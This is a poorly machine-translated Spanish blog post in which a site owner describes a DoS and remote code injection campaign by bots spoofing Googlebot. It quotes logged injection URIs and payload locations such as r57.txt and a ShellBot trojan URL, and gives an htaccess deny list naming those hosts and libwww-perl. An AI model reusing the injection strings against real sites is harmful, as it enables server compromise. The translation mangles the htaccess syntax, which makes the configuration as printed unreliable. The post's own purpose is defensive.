Por este tres últimos días en este blog está sufriendo ataques DOS. El ataque está todavía vivo ahora no creo que dejará aún. I cant prohibido este robot directamente, ya que se forja el envío de paquetes (paquetes de suplantación de identidad), como googlebot http://www.whois-search.com/whois/64.233.166.136. Im aún buscan el derecho ISP.
OrgName: Google Inc OrgID: GOGL Dirección: 1600 Amphitheater Parkway Ciudad: Mountain View StateProv: CA Código Postal: 94043 País: EE.UU.
En el momento que se me bloquearon todos los flujos de distancia de su anfitrión al azar y *. com "perl bot firma", pero el bloqueo no se detendrá el martilleo de este sitio. Me va a enviar 503 (Servicio no disponible), relativa a determinadas solicitud de modo que si usted está teniendo problemas para acceder a este sitio, por favor, vuelva más tarde.
Tipo de inyecciones
Hay mucho uri parámetro en mi logs (I will discapacitados logs del servidor - límite de los recursos) que probablemente tiene una gran inventarios de listas de verificación de vulnerabilidades conocidas CMS. Sólo puedo confirmar que uno de sus blackhat SEO spam bots, ya que URI de la solicitud incluirá la típica order.php página.
/ es / wordpress / cómo-a-retirado-wordpress-net-en-spam de inyección infectados por Mike-ja gger-goro-class-mailphp/order.php /? wp http://hom3.t35.com/xpl/hack/id.txt =? / es / wordpress / order.php /? wp http://hom3.t35.com/xpl/hack/id.txt =? / order.php? wp http://hom3.t35.com/xpl/hack/id.txt =?
Para ver la siguiente fuente que necesita para excluir el sitio web de su programa anti-virus.
- Perl / troyano ShellBot.B - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess bloqueado mala Código de inyectores y Perl Bot (botnet)
Si usted tiene problemas similares. usted debe bloquear el siguiente dominio en el htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. En" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-oro \. Net" codeinjector_ref = 1 SetEnvIfNoCase User-Agent "^ libwww-perl *" shell_bots = 1 SetEnvIfNoCase User-Agent "^ * Amidalla" shell_bots = 1 <FilesMatch "(.*)"> Orden permitir, negar Dejar de todas las Denegar de env = codeinjector_ref Denegar de env = shell_bots </ FilesMatch>
si u arent seguro de si el soporte para el servidor de recapitulación mod_setenvif como el siguiente ejemplo.
<IfModule Mod_setenvif.c> # ... reemplazar esta línea con el código anterior ... </ IfModule>
¿Cómo trampa Perl Shell Bot
Necesitamos un modelo para los robots esta trampa. Ciertamente sabíamos que estos robots:
- no robot.txt honor
- de rastreo de todos los subdirectorio
- que tiene un patrón de solicitud URI
Por ahora sólo crear subdirectorio para auto de prohibición (y algunas otras cosas) sobre la base de su patrón. Alexa bot se prohibió también que robot.txt No honor.
Voy a estar actualizando este post de vez en cuando. Hacemos controles de los artículos relacionados sobre la forma de paquetes de suplantación de identidad y validación de forjar / falso paquete.
Scan & reciente actualización
La lista a continuación se añade automáticamente.
- 24 de diciembre de 2007
- IP: 64.26.63.10 parámetros: login =,? inyectar: http://pawang.in/r57.txt
- 24 de diciembre de 2007
- IP: 64.26.63.10 parámetro: dir =, login = inyectar: http://pawang.in/r57.txt?
- 25 de diciembre de 2007
- IP: 59.158.128.138 parámetros: p =,: = inyectar allinurl: http://gw-gold.net/jpg/pictures/test.txt
Recursos Externos
- 21 de diciembre de 2007 a las 10:48 pm
- 16 de febrero de 2008 a 3:05 horas
- 0,3
- URL
No Responses to "Misa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl y troyano bot"
Trackback URL: Utilice el TrackBack URL ↑ hacer ping a este artículo. Si tu blog no soporta Trackbacks puede que desee dejar un comentario lugar.
"escribir como si estuviera hablando con un buen amigo (en frente de su madre)."
. Usted tiene la palabra
Descargo de responsabilidad: Para cualquier contenido que usted post, usted otorga a Kakkoi la libre de regalías, irrevocable, perpetuo, exclusivo y totalmente sublicensable licencia para utilizar, reproducir, modificar, adaptar, publicar, traducir, crear trabajos derivados, distribuir, ejecutar y mostrar dicho contenido en su totalidad o en parte, en todo el mundo e incorporarlo en otros trabajos, en cualquier forma, los medios de comunicación o tecnología conocida ahora o desarrollada más adelante. Algunos derechos reservados.









El siguiente "Código" tienen por objeto proteger a usted ya otros usuarios de este sitio.
Con el fin de mantener estas experiencias agradable e interesante para todos nuestros usuarios, le pedimos que siga las Directrices.
ser el primero en comentar.